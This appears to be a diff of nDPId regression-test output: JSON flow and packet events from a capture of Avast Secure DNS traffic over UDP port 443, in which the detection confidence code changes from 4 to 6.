-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482486856,"flow_last_seen":1625482486976,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482396199,"flow_last_seen":1625482396320,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482401089,"flow_last_seen":1625482401211,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484544,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482399044,"flow_last_seen":1625482399165,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482486856,"flow_last_seen":1625482486976,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482998333,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1625483010449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483010449,"pkt":"eJS0JASgYDjgxTWgCABFAABDf5MAAH8RH5\/AqAJktdYjlejdAbsALyrioMIBAAABAAAAAAAAATIJc0VDVXJFRG5zBWFWQXN0A2NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1625483010570,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483010570,"pkt":"YDjgxTWgeJS0JASgCABFAADMH70AADMRyuy11iOVwKgCZAG76N0AuKNQoMKBgAABAAEAAAAAATIJc0VDVXJFRG5zBWFWQXN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1625483073336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483073336,"pkt":"eJS0JASgYDjgxTWgCABFAABDR0IAAH8RV\/DAqAJktdYjlf4nAbsAL7S54cABAAABAAAAAAAAATIJc0VDVXJFRG5zBWF2QXN0A0NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMaN0AADIRgsy11iOVwKgCZAG7\/icAuC0o4cCBgAABAAEAAAAAATIJc0VDVXJFRG5zBWF2QXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483073457,"pkt":"eJS0JASgYDjgxTWgCABFAABDRz4AAH8RV\/TAqAJktdYjlcrZAbsAL46OWvoBAAABAAAAAAAAATIJU0VjVXJlRG5zBWFWQXN0A2NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMZ5oAADIRhA+11iOVwKgCZAG7ytkAuAb9WvqBgAABAAEAAAAAATIJU0VjVXJlRG5zBWFWQXN0A2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625483073457,"pkt":"eJS0JASgYDjgxTWgCABFAABDRzoAAH8RV\/jAqAJktdYjlczBAbsAL78\/SIEBAAABAAAAAAAAATIJc2VDVXJlZE5zBWFWQVNUA2NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMX7kAADIRi\/C11iOVwKgCZAG7zMEAuDeuSIGBgAABAAEAAAAAATIJc2VDVXJlZE5zBWFWQVNUA2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":63,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":6665,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":31,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":162,"global_ts_msec":1625511643408} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1625511643408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625511643408,"pkt":"eJS0JASgYDjgxTWgCABFAABDhScAAH8RGgvAqAJktdYjlehSAbsAL7NiOO0BAAABAAAAAAAAATIJU2VDVVJFZG5zBUFWYVN0A2NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511643408,"flow_last_seen":1625511643408,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511643408,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1625511643529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625511643529,"pkt":"YDjgxTWgeJS0JASgCABFAADM0vYAADMRF7O11iOVwKgCZAG76FIAuCvROO2BgAABAAEAAAAAATIJU2VDVVJFZG5zBUFWYVN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1625511645426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625511645426,"pkt":"eJS0JASgYDjgxTWgCABFAABDhSsAAH8RGgfAqAJktdYjldJPAbsAL0czmx8BAAABAAAAAAAAATIJc2VDVVJFRE5TBWF2QVN0A2NvbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625511645426,"flow_last_seen":1625511645426,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625511645426,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1625511645546,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625511645546,"pkt":"YDjgxTWgeJS0JASgCABFAADM008AADMRF1q11iOVwKgCZAG70k8AuL+hmx+BgAABAAEAAAAAATIJc2VDVVJFRE5TBWF2QVN0A2NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483010449,"flow_last_seen":1625483010570,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 